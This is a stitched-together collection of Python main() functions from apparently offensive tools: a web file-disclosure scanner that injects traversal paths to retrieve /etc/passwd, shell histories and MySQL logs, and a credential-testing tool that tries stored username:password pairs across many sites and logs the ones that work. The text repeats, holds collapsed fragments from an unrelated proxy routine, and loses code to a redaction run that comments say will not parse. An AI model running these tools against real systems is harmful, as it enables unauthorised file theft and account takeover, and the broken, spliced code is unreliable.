def main():
    """
    Initializes and executes the program: parses options, configures the
    proxy/user-agent, probes the target's original and invalid responses,
    then fans out file-disclosure test cases across worker threads.
    """

    global args

    # Shared knowledge base: results list, found flag, and locks used by workers.
    kb.files = []
    kb.found = False
    kb.print_lock = threading.Lock()
    kb.value_lock = threading.Lock()

    check_revision()

    print(BANNER)

    args = parse_args()

    if args.update:
        update()
        exit()

    # Test cases come either from the built-in set or from a user-supplied list file.
    cases = get_cases(args) if not args.list_file else load_list(args.list_file)

    if args.list:
        args.list = args.list.lower()
        _ = ("category", "software", "os")
        if args.list not in _:
            print("[!] Valid values for option '--list' are: %s" % ", ".join(_))
            exit()
        print("[i] Listing available filters for usage with option '--%s':\n" % args.list)
        try:
            # Deduplicate filter values; quote any value containing non-alphanumerics.
            for _ in set([_[args.list] for _ in cases]):
                print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _)
        except KeyError:
            pass
        finally:
            # Listing mode always terminates here, even after a KeyError.
            exit()

    if args.ignore_proxy:
        # Empty handler dict disables any environment-configured proxy.
        _ = ProxyHandler({})
        opener = build_opener(_)
        install_opener(opener)
    elif args.proxy:
        from thirdparty.socks import socks
        match = re.search(r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I)
        if match:
            # SOCKS proxies are installed globally via the socks module,
            # HTTP(S) proxies via a urllib opener.
            if match.group("type").upper() == PROXY_TYPE.SOCKS4:
                socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True)
            elif match.group("type").upper() == PROXY_TYPE.SOCKS5:
                socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True)
            elif match.group("type").upper() in (PROXY_TYPE.HTTP, PROXY_TYPE.HTTPS):
                _ = ProxyHandler({match.group("type"): args.proxy})
                opener = build_opener(_)
                install_opener(opener)

    if args.random_agent:
        # Pick one random User-Agent line from the bundled list.
        with open(USER_AGENTS_FILE, 'r') as f:
            args.user_agent = random.sample(f.readlines(), 1)[0]

    kb.parsed_target_url = urlsplit(args.url)
    # POST data takes precedence over the URL query string as the parameter source.
    kb.request_params = args.data if args.data else kb.parsed_target_url.query

    if not args.param:
        # Auto-select the first key=value pair as the injectable parameter.
        match = re.match("(?P<param>[^=&]+)={1}(?P<value>[^=&]+)", kb.request_params)
        if match:
            args.param = match.group("param")
        else:
            print("[!] No usable GET/POST parameters found.")
            exit()

    if args.os:
        kb.restrict_os = args.os

    print("[i] Starting scan at: %s\n" % time.strftime("%X"))

    # Baseline 1: the page as-is (no payload), used later for comparison.
    print("[i] Checking original response...")
    request_args = prepare_request(None)
    request_args["url"] = args.url
    if args.data:
        request_args["data"] = args.data
    kb.original_response = get_page(**request_args)

    # Baseline 2: response for a known-nonexistent file.
    print("[i] Checking invalid response...")
    request_args = prepare_request(INVALID_FILENAME)
    kb.invalid_response = get_page(**request_args)

    print("[i] Done!")
    print("[i] Searching for files...")

    if args.threads > 1:
        print("[i] Starting %d threads" % args.threads)

    # Stripe the cases round-robin across daemon worker threads.
    threads = []
    for i in xrange(args.threads):
        thread = threading.Thread(target=try_cases, args=([cases[_] for _ in xrange(i, len(cases), args.threads)],))
        thread.daemon = True
        thread.start()
        threads.append(thread)

    # Poll instead of join() so Ctrl-C stays responsive (daemon threads).
    alive = True
    while alive:
        alive = False
        for thread in threads:
            if thread.isAlive():
                alive = True
                time.sleep(0.1)

    if not kb.found:
        print("[i] No files found!")
    elif args.verbose:
        print("\n[i] Files found:")
        for _ in kb.files:
            print("[o] %s" % _)

    print(" \n[i] File search complete.")
    print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))
if not _: errMsg = "Proxy authentication credentials " errMsg += "value must be in format username:password" raise PocsuiteSyntaxException(errMsg) else: username = _.group(1) password = _.group(2) if scheme == PROXY_TYPE.SOCKS4: proxyMode = socks.PROXY_TYPE_SOCKS4 elif scheme == PROXY_TYPE.SOCKS5: proxyMode = socks.PROXY_TYPE_SOCKS5 else: proxyMode = socks.PROXY_TYPE_HTTP socks.setdefaultproxy(proxyMode, hostname, port, username=username, password=password) socket.socket = socks.socksocket def _setHTTPTimeout(): """ Set the HTTP timeout """ if conf.timeout: infoMsg = "setting the HTTP timeout" logger.log(CUSTOM_LOGGING.SYSINFO, infoMsg) conf.timeout = float(conf.timeout) if conf.timeout < 3.0:
def main():
    """
    Initializes and executes the program: loads versioned file locations from
    versions.ini, parses options, configures proxy/user-agent, validates the
    target's parameters and baseline responses, then runs threaded file search.
    """

    global args

    # Shared knowledge base: results, found flag, worker locks, and the map of
    # software-version sections to file locations read from versions.ini.
    kb.files = []
    kb.found = False
    kb.print_lock = threading.Lock()
    kb.value_lock = threading.Lock()
    kb.versioned_locations = {}

    check_revision()

    print(BANNER)

    args = parse_args()

    if args.update:
        update()
        exit()

    # Parse INI-style versions.ini: "[section]" headers, one location per line.
    # (xreadlines is the Python 2 file API.)
    with open("versions.ini") as f:
        section = None
        for line in f.xreadlines():
            line = line.strip()
            if re.match(r"\[.+\]", line):
                section = line.strip("[]")
            elif line:
                if section not in kb.versioned_locations:
                    kb.versioned_locations[section] = []
                kb.versioned_locations[section].append(line)

    cases = get_cases(args) if not args.list_file else load_list(args.list_file)

    if not cases:
        print("[!] No available test cases with the specified attributes.\n"
              "[!] Please verify available options with --list.")
        exit()

    if args.list:
        args.list = args.list.lower()
        _ = ("category", "software", "os")
        if args.list not in _:
            print("[!] Valid values for option '--list' are: %s" % ", ".join(_))
            exit()
        print("[i] Listing available filters for usage with option '--%s':\n" % args.list)
        try:
            # Deduplicate filter values; quote values with non-alphanumerics.
            for _ in set([_[args.list] for _ in cases]):
                print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _)
        except KeyError:
            pass
        finally:
            # Listing mode always terminates here.
            exit()

    if args.ignore_proxy:
        # Empty handler dict disables any environment-configured proxy.
        _ = ProxyHandler({})
        opener = build_opener(_)
        install_opener(opener)
    elif args.proxy:
        match = re.search(r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I)
        if match:
            if match.group("type").upper() in (PROXY_TYPE.HTTP, PROXY_TYPE.HTTPS):
                _ = ProxyHandler({match.group("type"): args.proxy})
                opener = build_opener(_)
                install_opener(opener)
            else:
                # SOCKS support is imported lazily, only when needed.
                from thirdparty.socks import socks
                if match.group("type").upper() == PROXY_TYPE.SOCKS4:
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True)
                elif match.group("type").upper() == PROXY_TYPE.SOCKS5:
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True)
        else:
            print("[!] Wrong proxy format (proper example: \"http://127.0.0.1:8080\").")
            exit()

    if args.random_agent:
        # Pick one random User-Agent line from the bundled list.
        with open(USER_AGENTS_FILE, 'r') as f:
            args.user_agent = random.sample(f.readlines(), 1)[0]

    kb.parsed_target_url = urlsplit(args.url)
    # POST data takes precedence over the URL query string as the parameter source.
    kb.request_params = args.data if args.data else kb.parsed_target_url.query

    if not args.param:
        match = re.match("(?P<param>[^=&]+)=(?P<value>[^=&]+)", kb.request_params)
        if match:
            args.param = match.group("param")
        else:
            # No non-empty pair found; report any empty-valued parameters so the
            # user understands why auto-selection failed.
            found = False
            for match in re.finditer("(?P<param>[^=&]+)=(?P<value>[^=&]*)", kb.request_params):
                found = True
                print("[x] Parameter with empty value found ('%s')." % match.group("param"))
            if found:
                print("[!] Please always use non-empty (valid) parameter values.")
            print("[!] No usable GET/POST parameters found.")
            exit()

    if args.os:
        kb.restrict_os = args.os

    print("[i] Starting scan at: %s\n" % time.strftime("%X"))

    # Baseline 1: the page as-is (no payload).
    print("[i] Checking original response...")
    request_args = prepare_request(None)
    request_args["url"] = args.url
    if args.data:
        request_args["data"] = args.data
    kb.original_response = get_page(**request_args)

    if not kb.original_response:
        print("[!] Something seems to be wrong with connection settings.")
        if not args.verbose:
            print("[i] Please rerun with switch '-v'.")
        exit()

    # Baseline 2: response for a known-nonexistent file, including any
    # user-supplied payload prefix/postfix so it matches real probes.
    print("[i] Checking invalid response...")
    request_args = prepare_request("%s%s%s" % (args.prefix, INVALID_FILENAME, args.postfix))
    kb.invalid_response = get_page(**request_args)

    print("[i] Done!")
    print("[i] Searching for files...")

    if args.threads > 1:
        print("[i] Starting %d threads." % args.threads)

    # Stripe the cases round-robin across daemon worker threads.
    threads = []
    for i in xrange(args.threads):
        thread = threading.Thread(target=try_cases, args=([cases[_] for _ in xrange(i, len(cases), args.threads)],))
        thread.daemon = True
        thread.start()
        threads.append(thread)

    # Poll instead of join() so Ctrl-C stays responsive (daemon threads).
    alive = True
    while alive:
        alive = False
        for thread in threads:
            if thread.isAlive():
                alive = True
                time.sleep(0.1)

    if not kb.found:
        print("[i] No files found!")
    elif args.verbose:
        print("\n[i] Files found:")
        for _ in kb.files:
            print("[o] %s" % _)

    print(" \n[i] File search complete.")
    print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))
def main(): """ Initializes and executes the program """ use_revision() print(BANNER) args = parse_args() found = False kb = {} files = [] if args.update: update() exit() cases = get_cases(args) if args.list: print("[i] Listing available filters for usage with option '--%s':\n" % args.list) for _ in set([_[args.list] for _ in cases]): print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _) exit() if args.ignore_proxy: _ = ProxyHandler({}) opener = build_opener(_) install_opener(opener) elif args.proxy: from thirdparty.socks import socks match = re.search( r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").lower() == "socks4": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").lower() == "socks5": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) elif match.group("type").lower() in ("http", "https"): _ = ProxyHandler({match.group("type"): args.proxy}) opener = build_opener(_) install_opener(opener) if args.random_agent: with open(USER_AGENTS_FILE, 'r') as f: args.user_agent = random.sample(f.readlines(), 1)[0] parsed_url = urlsplit(args.url) request_params = args.data if args.data else parsed_url.query if not args.param: match = re.match("(?P<param>[^=&]+)={1}(?P<value>[^=&]+)", request_params) if match: args.param = match.group(1) else: print("[!] 
no usable GET/POST parameters found") exit() print("[i] Starting scan at: %s\n" % time.strftime("%X")) def prepare_request(payload): """ Prepares HTTP (GET or POST) request with proper payload """ _ = re.sub(r"(?P<param>%s)={1}(?P<value>[^=&]+)" % args.param, r"\1=%s" % payload, request_params) request_args = { "url": "%s://%s%s" % (parsed_url.scheme or "http", parsed_url.netloc, parsed_url.path) } if args.data: request_args["data"] = _ else: request_args["url"] += "?%s" % _ if args.header: request_args["header"] = args.header if args.cookie: request_args["cookie"] = args.cookie if args.user_agent: request_args["user_agent"] = args.user_agent request_args["verbose"] = args.verbose return request_args def clean_response(response, filepath): """ Cleans response from occurrences of filepath """ response = response.replace(filepath, "") regex = re.sub(r"[^A-Za-z0-9]", "(.|&\w+;|%[0-9A-Fa-f]{2})", filepath) return re.sub(regex, "", response, re.I) print("[i] Checking original response...") request_args = prepare_request(None) request_args["url"] = args.url if args.data: request_args["data"] = args.data original_response = get_page(**request_args) print("[i] Checking invalid response...") request_args = prepare_request(INVALID_FILENAME) invalid_response = get_page(**request_args) print("[i] Done!") print("[i] Searching for files...") def request_file(case, replace_slashes=True):
errMsg += "value must be in format username:password" raise PocsuiteSyntaxException(errMsg) else: username = _.group(1) password = _.group(2) if scheme == PROXY_TYPE.SOCKS4: proxyMode = socks.PROXY_TYPE_SOCKS4 elif scheme == PROXY_TYPE.SOCKS5: proxyMode = socks.PROXY_TYPE_SOCKS5 else: proxyMode = socks.PROXY_TYPE_HTTP socks.setdefaultproxy(proxyMode, hostname, port, username=username, password=password) socket.socket = socks.socksocket def _setHTTPTimeout(): """ Set the HTTP timeout """ if conf.timeout: infoMsg = "setting the HTTP timeout" logger.log(CUSTOM_LOGGING.SYSINFO, infoMsg) conf.timeout = float(conf.timeout)
def main():
    """
    Initializes and executes the program: parses options, configures the
    proxy/user-agent, fetches baseline responses, then requests every test
    case and heuristically compares responses to detect disclosed files.
    Found /etc/passwd and mysql-bin.index contents are further parsed to
    derive additional file locations to probe.
    """
    use_revision()
    print(BANNER)
    args = parse_args()

    # Scan-local state: success flag, per-run knowledge base, found-file list.
    found = False
    kb = {}
    files = []

    if args.update:
        update()
        exit()

    cases = get_cases(args)

    if args.list:
        print("[i] Listing available filters for usage with option '--%s':\n" % args.list)
        # Deduplicate filter values; quote values with non-alphanumerics.
        for _ in set([_[args.list] for _ in cases]):
            print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _)
        exit()

    if args.ignore_proxy:
        # Empty handler dict disables any environment-configured proxy.
        _ = ProxyHandler({})
        opener = build_opener(_)
        install_opener(opener)
    elif args.proxy:
        from thirdparty.socks import socks
        match = re.search(r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I)
        if match:
            # SOCKS proxies are installed globally, HTTP(S) via a urllib opener.
            if match.group("type").lower() == "socks4":
                socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True)
            elif match.group("type").lower() == "socks5":
                socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True)
            elif match.group("type").lower() in ("http", "https"):
                _ = ProxyHandler({match.group("type"): args.proxy})
                opener = build_opener(_)
                install_opener(opener)

    if args.random_agent:
        # Pick one random User-Agent line from the bundled list.
        with open(USER_AGENTS_FILE, 'r') as f:
            args.user_agent = random.sample(f.readlines(), 1)[0]

    parsed_url = urlsplit(args.url)
    # POST data takes precedence over the URL query string as the parameter source.
    request_params = args.data if args.data else parsed_url.query

    if not args.param:
        # Auto-select the first key=value pair as the injectable parameter.
        match = re.match("(?P<param>[^=&]+)={1}(?P<value>[^=&]+)", request_params)
        if match:
            args.param = match.group(1)
        else:
            print("[!] no usable GET/POST parameters found")
            exit()

    print("[i] Starting scan at: %s\n" % time.strftime("%X"))

    def prepare_request(payload):
        """
        Prepares HTTP (GET or POST) request arguments with the payload
        substituted for the chosen parameter's value.
        """
        _ = re.sub(r"(?P<param>%s)={1}(?P<value>[^=&]+)" % args.param, r"\1=%s" % payload, request_params)
        request_args = {"url": "%s://%s%s" % (parsed_url.scheme or "http", parsed_url.netloc, parsed_url.path)}
        if args.data:
            request_args["data"] = _
        else:
            request_args["url"] += "?%s" % _
        if args.header:
            request_args["header"] = args.header
        if args.cookie:
            request_args["cookie"] = args.cookie
        if args.user_agent:
            request_args["user_agent"] = args.user_agent
        request_args["verbose"] = args.verbose
        return request_args

    def clean_response(response, filepath):
        """
        Cleans response from occurrences of filepath (verbatim and in
        HTML-entity/percent-encoded disguises) before similarity comparison.
        """
        response = response.replace(filepath, "")
        # Raw string: the replacement contains literal "\w" as regex source text.
        regex = re.sub(r"[^A-Za-z0-9]", r"(.|&\w+;|%[0-9A-Fa-f]{2})", filepath)
        # BUGFIX: re.I was previously passed as re.sub's positional 4th argument,
        # which is `count` (limiting substitutions to 2), not `flags`.
        return re.sub(regex, "", response, flags=re.I)

    # Baseline 1: the page as-is (no payload).
    print("[i] Checking original response...")
    request_args = prepare_request(None)
    request_args["url"] = args.url
    if args.data:
        request_args["data"] = args.data
    original_response = get_page(**request_args)

    # Baseline 2: response for a known-nonexistent file.
    print("[i] Checking invalid response...")
    request_args = prepare_request(INVALID_FILENAME)
    invalid_response = get_page(**request_args)

    print("[i] Done!")
    print("[i] Searching for files...")

    def request_file(case, replace_slashes=True):
        """
        Requests a single candidate file and decides, by fuzzy comparison
        against the invalid-file baseline, whether it was disclosed.
        Returns the page HTML on a hit, otherwise None.
        """
        if args.replace_slash and replace_slashes:
            case["location"] = case["location"].replace("/", args.replace_slash.replace("\\", "\\\\"))

        # Honor an OS restriction chosen earlier (by option or by prompt).
        if kb.get("restrict_os") and kb.get("restrict_os") != case["os"]:
            if args.verbose:
                print("[*] Skipping '%s'" % case["location"])
            return None

        # Avoid a double slash between prefix and absolute location.
        if args.prefix and args.prefix[len(args.prefix) - 1] == "/":
            args.prefix = args.prefix[:-1]

        if args.verbose:
            print("[*] Trying '%s'" % case["location"])

        request_args = prepare_request("%s%s%s" % (args.prefix, case["location"], args.postfix))
        html = get_page(**request_args)

        if not html or args.bad_string and html.find(args.bad_string) != -1:
            return None

        # A response sufficiently dissimilar from the invalid-file baseline is a hit.
        matcher = difflib.SequenceMatcher(None, clean_response(html, case["location"]), clean_response(invalid_response, INVALID_FILENAME))
        if matcher.quick_ratio() < HEURISTIC_RATIO:
            if not found:
                print("[i] Possible file(s) found!")
                print("[i] OS: %s" % case["os"])
                if kb.get("restrict_os") is None:
                    answer = ask_question("Do you want to restrict further scans to '%s'? [Y/n]" % case["os"], default='Y', automatic=args.automatic)
                    # Stores the OS name on "yes", False on "no".
                    kb["restrict_os"] = answer.upper() != 'N' and case["os"]

            _ = "'%s' (%s/%s/%s)" % (case["location"], case["os"], case["category"], case["type"])
            # Collapse a duplicated "os/os/" path segment in the display string.
            _ = _.replace("%s/%s/" % (case["os"], case["os"]), "%s/" % case["os"])
            print("[+] Found %s" % _)

            if args.verbose:
                files.append(_)

            # If --write-file is set
            if args.write_files:
                _ = os.path.join("output", parsed_url.netloc)
                if not os.path.exists(_):
                    os.makedirs(_)
                with open(os.path.join(_, "%s.txt" % case["location"].replace(args.replace_slash if args.replace_slash else "/", "_")), "w") as f:
                    content = html
                    if kb.get("filter_output") is None:
                        answer = ask_question("Do you want to filter retrieved files from original HTML page content? [Y/n]", default='Y', automatic=args.automatic)
                        kb["filter_output"] = answer.upper() != 'N'
                    if kb.get("filter_output"):
                        # Strip the longest common prefix/suffix shared with the
                        # original page, leaving only the disclosed file content.
                        matcher = difflib.SequenceMatcher(None, html, original_response)
                        matching_blocks = matcher.get_matching_blocks()
                        if matching_blocks:
                            start = matching_blocks[0]
                            if start[0] == start[1] == 0 and start[2] > 0:
                                content = content[start[2]:]
                            if len(matching_blocks) > 2:
                                end = matching_blocks[-2]
                                if end[2] > 0 and end[0] + end[2] == len(html) and end[1] + end[2] == len(original_response):
                                    content = content[:-end[2]]
                    f.write(content)
            return html
        return None

    # Test file locations in XML file
    for case in cases:
        html = request_file(case)
        if html is None:
            continue
        if not found:
            found = True

        # If --skip-file-parsing is not set.
        if case["location"] in ("/etc/passwd", "/etc/security/passwd") and not args.skip_parsing:
            # Derive per-user dotfile locations from passwd home directories.
            users = re.findall("(?P<username>[^:\n]+):(?P<password>[^:]*):(?P<uid>\d+):(?P<gid>\d*):(?P<info>[^:]*):(?P<home>[^:]+):[/a-z]*", html)
            if args.verbose:
                print("[*] Extracting home folders from '%s'" % case["location"])
            for user in users:
                if args.verbose:
                    print("[*] User: %s, Info: %s" % (user[0], user[4]))
                for _ in (".bash_config", ".bash_history", ".bash_logout", ".ksh_history", ".Xauthority"):
                    if user[5] == "/":
                        continue
                    request_file({"category": "*NIX Password File", "type": "conf", "os": case["os"], "location": "%s/%s" % (user[5], _), "software": "*NIX"})

        if "mysql-bin.index" in case["location"] and not args.skip_parsing:
            # Derive binary-log file names next to the index file.
            binlogs = re.findall("\\.\\\\(?P<binlog>mysql-bin\\.\\d{0,6})", html)
            location = case["location"].rfind("/") + 1
            if args.verbose:
                print("[i] Extracting MySQL binary logs from '%s'" % case["location"])
            for _ in binlogs:
                request_file({"category": "Databases", "type": "log", "os": case["os"], "location": "%s%s" % (case["location"][:location], _), "software": "MySQL"}, False)

    if not found:
        print("[i] No files found!")
    elif args.verbose:
        print("\n[i] Files found:")
        for _ in files:
            print("[o] %s" % _)

    print("\n[i] File search complete.")
    print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))
def main():
    """
    Initializes and executes the program: tests supplied (or file-loaded)
    credentials against every configured site, logging successes to a file
    and printing a summary with the overall success rate.
    """
    # Per-run result buckets (note: "sucessful" spelling kept from original).
    login_sucessful = []
    login_failed = []
    login_skipped = []

    version = check_revision(VERSION)

    print("%s\n\n%s %s (%s)\n" % (
        BANNER % tuple([color(_) for _ in BANNER_PASSWORDS]), NAME, version, URL))

    args = parse_args()

    if args.update:
        update()
        exit()

    if args.list:
        sites = list_sites()
        for _ in sites:
            print("- %s" % _)
        exit()

    if not args.password and not args.load_file:
        # NOTE(review): the "******" run below is redacted/scrubbed source — it
        # appears to have swallowed the tail of the getpass() prompt plus the
        # ignore_proxy/proxy branching and the re.search call that binds
        # `match`; this will not parse until the original code is restored.
        args.password = getpass("%s Please enter password:"******
                                "(?P<type>[^:]+)://(?P<address>[^:]+)"
                                r":(?P<port>\d+)", args.proxy, re.I)
        if match:
            if match.group("type").upper() in ("HTTP", "HTTPS"):
                proxy_host = "%s:%s" % (match.group("address"), match.group("port"))
                proxy_handler = ProxyHandler({"http": proxy_host, "https": proxy_host})
            else:
                # SOCKS support is imported lazily, only when needed; SOCKS is
                # installed globally, so no urllib handler is required.
                from thirdparty.socks import socks
                if match.group("type").upper() == "SOCKS4":
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True)
                elif match.group("type").upper() == "SOCKS5":
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True)
                proxy_handler = None
        else:
            proxy_handler = ProxyHandler()
    else:
        proxy_handler = None

    # One opener with cookie support; the proxy handler is added only if set.
    opener = build_opener(HTTPHandler(), HTTPSHandler(), HTTPCookieProcessor(cookie_handler))
    if proxy_handler:
        opener.add_handler(proxy_handler)
    install_opener(opener)

    # Pick one random User-Agent line from the bundled list.
    with open(USER_AGENTS_FILE, 'r') as ua_file:
        args.user_agent = sample(ua_file.readlines(), 1)[0].strip()

    credentials = {"username": args.username, "email": args.email, "password": quote(args.password)}

    sites = list_sites()
    # --only / --exclude filter the site list (mutually exclusive precedence).
    if args.only:
        sites = [site for site in sites if site in args.only]
    elif args.exclude:
        sites = [site for site in sites if site not in args.exclude]

    print("%s Loaded %d %s to test." % (INFO, len(sites), "site" if len(sites) == 1 else "sites"))

    if args.load_file:
        if not isfile(args.load_file):
            print("%s could not find the file \"%s\"" % (WARN, color(args.load_file)))
            exit()
        # Count lines to verify the file is non-empty before starting.
        _ = sum(1 for line in open(args.load_file, "r"))
        if _ < 1:
            print("%s the file \"%s\" doesn't contain any valid credentials." % (WARN, color(args.load_file)))
            exit()
        print("%s Loaded %d credential%s from \"%s\".\n" % (INFO, _, "s" if _ != 1 else "", color(args.load_file)))

    print("%s Starting tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW)))

    if not exists(OUTPUT_DIR):
        makedirs(OUTPUT_DIR)

    log = logger("%s/credmap" % OUTPUT_DIR)
    log.open()

    for site in sites:
        _ = populate_site(site, args)
        if not _:
            continue
        target = Website(_, {"verbose": args.verbose})
        if not target.user_agent:
            target.user_agent = args.user_agent

        def login():
            """
            Verify credentials for login and check if login was successful.
            Closes over `target`, `credentials` and the result lists.
            """
            # Skip when the site needs an identifier type we don't have.
            if(target.username_or_email == "email" and not credentials["email"] or
               target.username_or_email == "username" and not credentials["username"]):
                if args.verbose:
                    print("%s Skipping %s\"%s\" since "
                          "no \"%s\" was specified.\n"
                          % (INFO, "[%s:%s] on " % (credentials["username"] or credentials["email"],
                                                    credentials["password"]) if args.load_file else "",
                             color(target.name), color(target.username_or_email, BW)))
                login_skipped.append(target.name)
                return

            print("%s Testing %s\"%s\"..."
                  % (TEST, "[%s:%s] on " % (credentials["username"] or credentials["email"],
                                            credentials["password"]) if args.load_file else "",
                     color(target.name, BW)))

            # Fresh cookie jar per attempt so sessions don't leak across sites.
            cookie_handler.clear()

            if target.perform_login(credentials, cookie_handler):
                log.write(">>> %s - %s:%s\n" % (target.name, credentials["username"] or credentials["email"], credentials["password"]))
                login_sucessful.append("%s%s" % (target.name,
                                                 " [%s:%s]" % (credentials["username"] or credentials["email"],
                                                               credentials["password"]) if args.load_file else ""))
            else:
                login_failed.append(target.name)

        if args.load_file:
            # One login attempt per credential line ("user:pass"); an e-mail-shaped
            # first field is treated as the email identifier instead of username.
            with open(args.load_file, "r") as load_list:
                for user in load_list:
                    user = user.rstrip().split(":", 1)
                    if not user[0]:
                        continue
                    match = re.match(r"^[A-Za-z0-9._%+-]+@(?:[A-Z"
                                     r"a-z0-9-]+\.)+[A-Za-z]{2,12}$", user[0])
                    credentials = {"email": user[0] if match else None,
                                   "username": None if match else user[0],
                                   "password": user[1]}
                    login()
        else:
            login()

    log.close()

    if not args.verbose:
        print()

    if len(login_sucessful) > 0 or len(login_failed) > 0:
        _ = "%s/%s" % (color(len(login_sucessful), BW),
                       color(len(login_sucessful) + len(login_failed), BW))
        sign = PLUS if len(login_sucessful) > (len(login_failed) + len(login_skipped)) else INFO
        print("%s Succesfully logged in%s." % (sign, " with %s credentials on the list." % _
                                               if args.load_file else "to %s websites." % _),)
        print("%s An overall success rate of %s.\n"
              % (sign, color("%%%s" % (100 * len(login_sucessful) /
                                       (len(login_sucessful) + len(login_failed))), BW)))

    if len(login_sucessful) > 0:
        print("%s The provided credentials worked on the following website%s: "
              "%s\n" % (PLUS, "s" if len(login_sucessful) != 1 else "", ", ".join(login_sucessful)))

    print("%s Finished tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW)))
def main():
    """
    Initializes and executes the program: tests supplied (or file-loaded)
    credentials against every configured site. Supports a custom --format
    for credential files and prints a summary with the success rate.
    """
    # Per-run result buckets (note: "sucessful" spelling kept from original).
    login_sucessful = []
    login_failed = []
    login_skipped = []

    version = check_revision(VERSION)

    print("%s\n\n%s %s (%s)\n" % (BANNER % tuple([color(_) for _ in BANNER_PASSWORDS]), NAME, version, URL))

    args = parse_args()

    if args.update:
        update()
        exit()

    sites = list_sites()

    if args.list:
        for _ in sites:
            print("- %s" % _)
        exit()

    if not args.password and not args.load_file:
        # NOTE(review): the "******" run below is redacted/scrubbed source — it
        # appears to have swallowed the tail of the getpass() prompt plus the
        # ignore_proxy/proxy branching and the re.search call that binds
        # `match`; this will not parse until the original code is restored.
        args.password = getpass("%s Please enter password:"******
                                "(?P<type>[^:]+)://(?P<address>[^:]+)"
                                r":(?P<port>\d+)", args.proxy, re.I)
        if match:
            if match.group("type").upper() in ("HTTP", "HTTPS"):
                proxy_host = "%s:%s" % (match.group("address"), match.group("port"))
                proxy_handler = ProxyHandler({
                    "http": proxy_host,
                    "https": proxy_host
                })
            else:
                # SOCKS support is imported lazily; SOCKS is installed globally,
                # so no urllib handler is required.
                from thirdparty.socks import socks
                if match.group("type").upper() == "SOCKS4":
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True)
                elif match.group("type").upper() == "SOCKS5":
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True)
                proxy_handler = None
        else:
            proxy_handler = ProxyHandler()
    else:
        proxy_handler = None

    # One opener with cookie support; the proxy handler is added only if set.
    opener = build_opener(HTTPHandler(), HTTPSHandler(), HTTPCookieProcessor(cookie_handler))
    if proxy_handler:
        opener.add_handler(proxy_handler)
    install_opener(opener)

    # Pick one random User-Agent line from the bundled list.
    with open(USER_AGENTS_FILE, 'r') as ua_file:
        args.user_agent = sample(ua_file.readlines(), 1)[0].strip()

    # --only / --exclude filter the site list (mutually exclusive precedence).
    if args.only:
        sites = [site for site in sites if site in args.only]
    elif args.exclude:
        sites = [site for site in sites if site not in args.exclude]

    print("%s Loaded %d %s to test." % (INFO, len(sites), "site" if len(sites) == 1 else "sites"))

    if args.load_file:
        if not isfile(args.load_file):
            print("%s could not find the file \"%s\"" % (WARN, color(args.load_file)))
            exit()
        # Count lines to verify the file is non-empty before starting.
        _ = sum(1 for line in open(args.load_file, "r"))
        if _ < 1:
            print("%s the file \"%s\" doesn't contain any valid credentials."
                  % (WARN, color(args.load_file)))
            exit()
        print("%s Loaded %d credential%s from \"%s\".\n" % (INFO, _, "s" if _ != 1 else "", color(args.load_file)))

    print("%s Starting tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW)))

    if not exists(OUTPUT_DIR):
        makedirs(OUTPUT_DIR)

    log = Logger("%s/credmap" % OUTPUT_DIR)
    log.open()

    def get_targets():
        """
        Retrieve and yield list of sites (targets) for testing.
        """
        for site in sites:
            _ = populate_site(site, args)
            if not _:
                continue
            target = Website(_, {"verbose": args.verbose})
            if not target.user_agent:
                target.user_agent = args.user_agent
            yield target

    def login():
        """
        Verify credentials for login and check if login was successful.
        Closes over `target`, `credentials` and the result lists.
        """
        # Skip when the site needs an identifier type we don't have.
        if (target.username_or_email == "email" and not credentials["email"] or
                target.username_or_email == "username" and not credentials["username"]):
            if args.verbose:
                print(
                    "%s Skipping %s\"%s\" since "
                    "no \"%s\" was specified.\n"
                    % (INFO, "[%s:%s] on " % (credentials["username"] or credentials["email"],
                                              credentials["password"]) if args.load_file else "",
                       color(target.name), color(target.username_or_email, BW)))
            login_skipped.append(target.name)
            return

        print("%s Testing %s\"%s\"..."
              % (TEST, "[%s:%s] on " % (credentials["username"] or credentials["email"],
                                        credentials["password"]) if args.load_file else "",
                 color(target.name, BW)))

        # Fresh cookie jar per attempt so sessions don't leak across sites.
        cookie_handler.clear()

        if target.perform_login(credentials, cookie_handler):
            log.write(">>> %s - %s:%s\n" % (target.name, credentials["username"] or credentials["email"], credentials["password"]))
            login_sucessful.append(
                "%s%s" % (target.name,
                          " [%s:%s]" % (credentials["username"] or credentials["email"],
                                        credentials["password"]) if args.load_file else ""))
        else:
            login_failed.append(target.name)

    if args.load_file:
